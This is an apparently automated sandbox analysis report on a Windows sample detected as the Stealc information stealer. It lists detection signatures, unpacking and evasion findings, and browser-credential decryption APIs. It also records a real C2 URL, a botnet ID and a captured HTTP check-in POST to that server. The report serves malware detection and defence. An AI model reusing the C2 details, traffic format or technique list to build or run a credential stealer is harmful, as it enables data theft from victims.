Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1518566
MD5:df5444313433cc5c1126d41f68d71903
SHA1:cb63413ac534dd421c4ede152fcb678149c00a47
SHA256:8e39055538a72e61a512ed724904718edbddb544559d0b70bf5182440ca7723b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6036 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DF5444313433CC5C1126D41F68D71903)
    • WerFault.exe (PID: 3444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1052 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x2515:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1710064685.0000000004150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.3.file.exe.4150000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.file.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.file.exe.4100e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.file.exe.4100e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.file.exe.4150000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T20:42:05.878893+020020442431Malware Command and Control Activity Detected192.168.2.449730193.233.113.18480TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: file.exeAvira: detected
                    Source: http://193.233.113.184/6d687e53250c2111.php_eAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184/6d687e53250c2111.phpweAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184/Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184/6d687e53250c2111.phpAvira URL Cloud: Label: malware
                    Source: http://193.233.113.184Avira URL Cloud: Label: malware
                    Source: http://193.233.113.184/wsAvira URL Cloud: Label: malware
                    Source: 00000000.00000003.1710064685.0000000004150000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://193.233.113.184/6d687e53250c2111.php", "Botnet": "LogsDiller1"}
                    Source: file.exeReversingLabs: Detection: 39%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_041074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_041074A7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04119107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_04119107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04109D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_04109D27
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04109DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_04109DC7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_0410CA87

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0410E077
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0410C0D7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0410DCE7
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0410F917
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04114107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_04114107
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04101937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04101937
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0410E697
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04113B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_04113B17
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04114B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_04114B77
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0410EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0410EF87
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_041147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_041147D7

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 193.233.113.184:80
                    Source: Malware configuration extractorURLs: http://193.233.113.184/6d687e53250c2111.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAHost: 193.233.113.184Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 31 31 41 31 42 38 41 35 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 2d 2d 0d 0a Data Ascii: ------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="hwid"CF11A1B8A5973370857647------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="build"LogsDiller1------GHDAKKJJJKJKECBGCGDA--
                    Source: Joe Sandbox ViewASN Name: FREE-MPEIRU FREE-MPEIRU
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.113.184
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 193.233.113.184Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /6d687e53250c2111.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAHost: 193.233.113.184Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 31 31 41 31 42 38 41 35 39 37 33 33 37 30 38 35 37 36 34 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 31 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 4b 4b 4a 4a 4a 4b 4a 4b 45 43 42 47 43 47 44 41 2d 2d 0d 0a Data Ascii: ------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="hwid"CF11A1B8A5973370857647------GHDAKKJJJKJKECBGCGDAContent-Disposition: form-data; name="build"LogsDiller1------GHDAKKJJJKJKECBGCGDA--
                    Source: file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1892318943.000000000250E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184
                    Source: file.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1892394350.0000000002585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/
                    Source: file.exe, 00000000.00000002.1892394350.0000000002585000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php
                    Source: file.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.php_e
                    Source: file.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/6d687e53250c2111.phpwe
                    Source: file.exe, 00000000.00000002.1892394350.000000000257C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184/ws
                    Source: file.exe, 00000000.00000002.1892394350.000000000254A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://193.233.113.184~
                    Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1052
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\EK2VIB3W.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6036
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\758d21e9-859e-4c66-9fe0-f5dd44eca4e2Jump to behavior
                    Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: file.exeReversingLabs: Detection: 39%
                    Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1052
                    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0251E674 push eax; ret 0_2_0251E675
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02521B51 push 7DD07DC0h; iretd 0_2_02521B62
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02524B30 push eax; ret 0_2_02524B3F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02524B21 push eax; ret 0_2_02524B3F
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0411B29C push ecx; ret 0_2_0411B2AF
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
